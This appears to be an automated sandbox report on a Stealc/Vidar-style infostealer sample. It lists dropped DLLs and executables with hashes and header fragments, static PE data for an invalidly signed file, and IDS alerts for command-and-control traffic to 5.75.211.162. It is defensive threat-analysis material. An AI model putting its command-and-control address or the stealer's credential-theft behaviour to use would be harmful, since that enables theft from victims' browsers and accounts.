Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FBFHJJJDAF.exe.log

Download File

Process:	C:\ProgramData\FBFHJJJDAF.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FIEHIIIJDA.exe.log

Download File

Process:	C:\ProgramData\FIEHIIIJDA.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\76561199780418869[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	34725
Entropy (8bit):	5.398553228067779
Encrypted:	false
SSDEEP:	768:udpqme0Ih3tAA6WGA2fcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2S6:ud8me0Ih3tAA6WGA2FhTBv++nIjBtPFH
MD5:	2779AF06DD91BC5E0232E82E278E976D
SHA1:	901062B1B8B2E7F6CF2474CC08D0AC661934ED79
SHA-256:	40A89094F0DCC5258C0F164D355CBBD36A8E7F986A6FB533C6E58252842AD338
SHA-512:	380D71796036B1F5124389ABE65C7966E5C521F6BED2E5FF4482D07ECE1625ECFE28FE8AB487D5103D4D45BCB3E42200255780B77FC51D98EE4CAE821EE73559
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://5.75.211.162\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english" rel="stylesheet" type="text/css" >.<link href

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\ljhgfsd[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	385064
Entropy (8bit):	7.988110023083548
Encrypted:	false
SSDEEP:	6144:CQuuGQX/FN5CVU03+wwybsDV3Sdmq2r5tmsz2ViLEO:vui9N5iQ5p3Sd0TmsTEO
MD5:	16F5B27C9E1376C17B03BF8C5090DB3C
SHA1:	676145AB7CA93E0463B931E6A056804B8F42119E
SHA-256:	7952E7769A991C349CC092B9CB3D1505405E793B526F49C784C343DD7D3CD227
SHA-512:	23FE6E23E80257469C09BA68B2C78EE6B3C03700E8173EFF4E2CA94964AD3AB8F2B0CB20DD01E483BF6B7D8DE1138BC946CEBBA6BEC10D78E7CCEC6DC0C3CB5E
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f............................>.... ........@.. ....................... ............`.....................................S.......................(&........................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H...........0............................................................M.b.K..K.9~h.w....G).2..X..u.........&...W...`.r..I.z-@..W....y...x..e...g.O....f.&..~.vV.\...yM<..V&..z..B.).....y..-....g.*E..!T9.z...M..."...A...#..V..kj#.2....)........:r...-9\..hK<....f3u.xX....T.....+Q:.......T....X.i.v7.....Q.9vq. .M.r0..}k.t5J!..1.e..U..;....;..z.9_Y.T3?k%..L.6M....;.P.5W.'0....V.T,9wl..y....]....sj:y..k.4.$.".o.9.V+.@Re3Y..(...:.K.O#..L..X%.u..`&.1&..X{.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vdshfd[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	413224
Entropy (8bit):	7.988867781346718
Encrypted:	false
SSDEEP:	6144:O+0dGgr04h1LBuTmcYz43wUDPNvms5PYYzX3oYbEU6DsV4+1/QSyiZEO:30d/h1LBK13wUjx5QYTo0EUBVSS/EO
MD5:	2CCE29D734EA1D227B338834698E2DE4
SHA1:	41700CD1BCF5F5BCCA81CE722ED47FC17BD030C2
SHA-256:	F75ACF936390F89239C43552717EFB65C4C3190B16A7EEC62DCD0053A045E91D
SHA-512:	EA0B440113A225764B38AE2526A10F7E4F3081E4A353E9831CF0E846AC7BA97EA7C2B4A12AB6FAC5708A7855DA8967F1B6BC661757DC68D819D11887A6AF20B5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 34%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f............................><... ...@....@.. ....................................`..................................;..S....@...............(..(&...`.......:............................................... ............... ..H............text...D.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B................ <......H..........0............................................................R....^.G.Y..60...7~...r..f.b.xg]..s.j.{0..M....6.....{..[..@U....Nq!...+.. ....J.......2....5....QL".l....V......M@........_....)K...P.../p.wg..........7:?.C..f ....Sc...... x.n];.w1..e.$:z.d.>!.t..q....Vg.3c.h.hlWt..5...br...H.XD6...uW11v9I.\|...xJnLx......w>..>s...^.'.s2J....Y......U......-.E#).:....~...2]8...SU..f8zd.i..ns>..fx...:.U..&B....`.g...Z.L.#........03z..>..^...t.K.Y.[q

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199780418869[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	34725
Entropy (8bit):	5.398743396244985
Encrypted:	false
SSDEEP:	768:udpqme0Ih3tAA6WGA2fcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2Sl:ud8me0Ih3tAA6WGA2FhTBv++nIjBtPFk
MD5:	01E4C33FB1D212CD6ED5A7AC8C7A8A3A
SHA1:	4822AB3BF11B4AE4AB0825DDE2860BD869D5D778
SHA-256:	2B2278E92AE879070F2CA645437E4B1721A0BD81EED7A7E84599FAB465028287
SHA-512:	3EFA452F1AB5B3299BAC502FCDDA35D0505F9B1051B7BF61B17C65F512FF31FD45D15CB526334E8E0C05CAE84B825C64DF26E86A75584BEB38FE6D414613AD84
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://5.75.211.162\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english" rel="stylesheet" type="text/css" >.<link href

C:\Users\user\AppData\Local\Temp\delays.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ISO-8859 text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	1048575
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:8++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++5:U
MD5:	F3AB4DCAA95698B12DC2E6428C72EA48
SHA1:	FE4BAEB1EC00B25C74406F5B48BCBDCDAA906656
SHA-256:	23E43517EC34790C2A8F898383AB47D46738EB3FA241C736890095CEA791A2EF
SHA-512:	D1BA6DB32322FC41320713BFC1D6E05BEAE54DCE65F22F9507611CB1443EB1A60864E753E86B25580AFC990AA4204BC7F54AE297BF6027282947CAB2758A59F0
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\ProgramData\FIEHIIIJDA.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	33
Entropy (8bit):	2.2845972159140855
Encrypted:	false
SSDEEP:	3:i6vvRyMivvRya:iKvHivD
MD5:	45B4C82B8041BF0F9CCED0D6A18D151A
SHA1:	B4DAD3FFFEF507CBB78671EE620BB495F8CE22F1
SHA-256:	7CFA461ED1FC8611AB74878EDB1FBBDE3596F5D042946A42A7F31EB6D462E628
SHA-512:	B29C3696A8A311EFAF9B9709BA082FF2C8D45A6912D79BC1DE7FEEFBEF8F8DDEFCD6650B5E1165D0A79800C8AED399E2B11BC2431E3837DD8587516BDE50EAB5
Malicious:	false
Preview:	0..1..2..3..4..0..1..2..3..4.....

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.989026568690476
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	413'224 bytes
MD5:	e02a6087d9257c00071b3cc1508a95ef
SHA1:	8081f2bd757d470e08711133cfb7a4ca17f2fb1f
SHA256:	e0f1b468770374dc01046cd48f25609b5e04724a79323a049f02673ea0bcc811
SHA512:	51bf529586489576b9c1f4fc204dc15328a30a929f8d96c47bd13fe04f8aab43b45ba53352818b26af3f20d5ca86c6b7ec4f9bb750052b2b079a079092830fbc
SSDEEP:	12288:mo5mDRjeDmJaLmihjPYAGBJMJuydlSJstPJYHH0fwsMMGEO:mlRWlLmMjPYAGzuldsncwzBt
TLSH:	709423076E7860A6DF70CA742C5F43F37865A41779A2C3478E28159BBA9F7983236E40
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................><... ...@....@.. ....................................`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x463c3e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F591FF [Thu Sep 26 16:55:27 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/01/2023 01:00:00 17/01/2026 00:59:59
Subject Chain	CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1:	15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256:	28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial:	0997C56CAA59055394D9A9CDB8BEEB56

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x63be8	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0x5c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x62800	0x2628
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x66000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x63ab0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x61c44	0x61e00	14ce130d65da0a630923b8ee9fed9b4c	False	0.993791407247765	data	7.995579707906101	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x64000	0x5c8	0x600	db1daa9db276719b7dce2f7fee59adb7	False	0.4361979166666667	data	4.115782972549961	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x66000	0xc	0x200	668ddc03321cdfb17f8be719cbc539e8	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x640a0	0x334	data			0.4426829268292683
RT_MANIFEST	0x643d8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-26T20:14:25.533528+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49716	5.75.211.162	443	TCP
2024-09-26T20:14:26.699712+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49717	5.75.211.162	443	TCP
2024-09-26T20:14:28.111725+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49718	5.75.211.162	443	TCP
2024-09-26T20:14:28.830459+0200	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.5	49718	5.75.211.162	443	TCP
2024-09-26T20:14:29.523708+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49719	5.75.211.162	443	TCP
2024-09-26T20:14:30.233148+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	5.75.211.162	443	192.168.2.5	49719	TCP
2024-09-26T20:14:30.897295+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49720	5.75.211.162	443	TCP
2024-09-26T20:14:31.608429+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	5.75.211.162	443	192.168.2.5	49720	TCP
2024-09-26T20:14:32.363642+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49721	5.75.211.162	443	TCP
2024-09-26T20:14:33.403813+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49722	5.75.211.162	443	TCP
2024-09-26T20:14:36.898370+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49723	5.75.211.162	443	TCP
2024-09-26T20:14:37.978244+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49724	5.75.211.162	443	TCP
2024-09-26T20:14:39.132998+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49725	5.75.211.162	443	TCP
2024-09-26T20:14:40.276515+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49726	5.75.211.162	443	TCP
2024-09-26T20:14:42.021671+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49727	5.75.211.162	443	TCP
2024-09-26T20:14:43.792662+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49728	5.75.211.162	443	TCP
2024-09-26T20:14:45.483832+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49729	5.75.211.162	443	TCP
2024-09-26T20:14:47.180155+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49730	5.75.211.162	443	TCP
2024-09-26T20:14:48.525294+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49731	5.75.211.162	443	TCP
2024-09-26T20:14:51.482510+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49732	5.75.211.162	443	TCP
2024-09-26T20:14:52.769894+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49733	5.75.211.162	443	TCP
2024-09-26T20:14:54.199581+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49734	5.75.211.162	443	TCP
2024-09-26T20:14:55.599886+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49735	5.75.211.162	443	TCP
2024-09-26T20:14:57.690897+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.5	49737	5.75.211.162	443	TCP
